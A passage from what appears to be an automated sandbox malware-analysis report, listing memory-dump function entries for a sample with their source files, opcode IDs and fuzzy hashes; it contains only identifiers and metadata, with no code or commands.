                                                                      • Instruction Fuzzy Hash: 2031D66070D7C85FE757DB389864BA97FE1EF4B300F4A40EAD449CB2A7DA289904C351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f25dfd1a7ca916b0afa363027fd0975878d0aaa18552ea714ce2070c9247483
                                                                      • Instruction ID: b46c23ed7c1fbd921f56fba21e6ee0abfdc7ec64338274ac87b9930ab43b8344
                                                                      • Opcode Fuzzy Hash: 6f25dfd1a7ca916b0afa363027fd0975878d0aaa18552ea714ce2070c9247483
                                                                      • Instruction Fuzzy Hash: 2C219060B19A8C5FEB86EB2898607A97FE1EF4A340F5500E6D40DCB2DBDA389C448351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16907733a3be6bf2be3b5586c2a7625c04136fb8a24fe653f8db7d9337304cbc
                                                                      • Instruction ID: a582e5474ccb21cf769ef0e79f1f8a100b53bd5966d7cd94ee5bf3f6e7a2e30d
                                                                      • Opcode Fuzzy Hash: 16907733a3be6bf2be3b5586c2a7625c04136fb8a24fe653f8db7d9337304cbc
                                                                      • Instruction Fuzzy Hash: AF11062170D6C90FD756ABB88865BB57FD1EF9A211F0940F9E08CCB1A3ED5899058781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2e4de65356d81718bedf0e97b8dd65d3f7d7584000902b802cdc7671e7a9a81
                                                                      • Instruction ID: 10a5513e06ee5de0ade4c125c7da1e72b1973ac917036ba70b858ed418ea1060
                                                                      • Opcode Fuzzy Hash: f2e4de65356d81718bedf0e97b8dd65d3f7d7584000902b802cdc7671e7a9a81
                                                                      • Instruction Fuzzy Hash: EAF0C23050D7884FDB8697B48468A647FE0AF96211F0A01EBE088CB1B3DA148C48C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f89a645f42851ad85a18465fb0426629282632f94674fdc5134ad93549e02f7
                                                                      • Instruction ID: 885bd5fb13124c5d2f7fd3ac1b6659754d2bdfc60bdb3d861a8ca493e1fe1cf7
                                                                      • Opcode Fuzzy Hash: 9f89a645f42851ad85a18465fb0426629282632f94674fdc5134ad93549e02f7
                                                                      • Instruction Fuzzy Hash: AFF0F422B05C0E0FDBA4FBAC98A17B973D5EB9C351F01007AE40DC7291DD299C008780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4075960012.00007FFD9B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffd9b8e0000_G1lnGpOLK4.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9922a7391ab38d33a82a4a1f3e9841718f1761966cd56133b5a48ee60f6ad154
                                                                      • Instruction ID: 98dcbba1e4c746287a09ceecc31069c6a6fe7eadbdb6b455439e481f911e5bec
                                                                      • Opcode Fuzzy Hash: 9922a7391ab38d33a82a4a1f3e9841718f1761966cd56133b5a48ee60f6ad154
                                                                      • Instruction Fuzzy Hash: D5F0BE20B14A4D5FCB40FFA898509E977A5FF48225F40037AE81CC32D6DB38A5449341
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%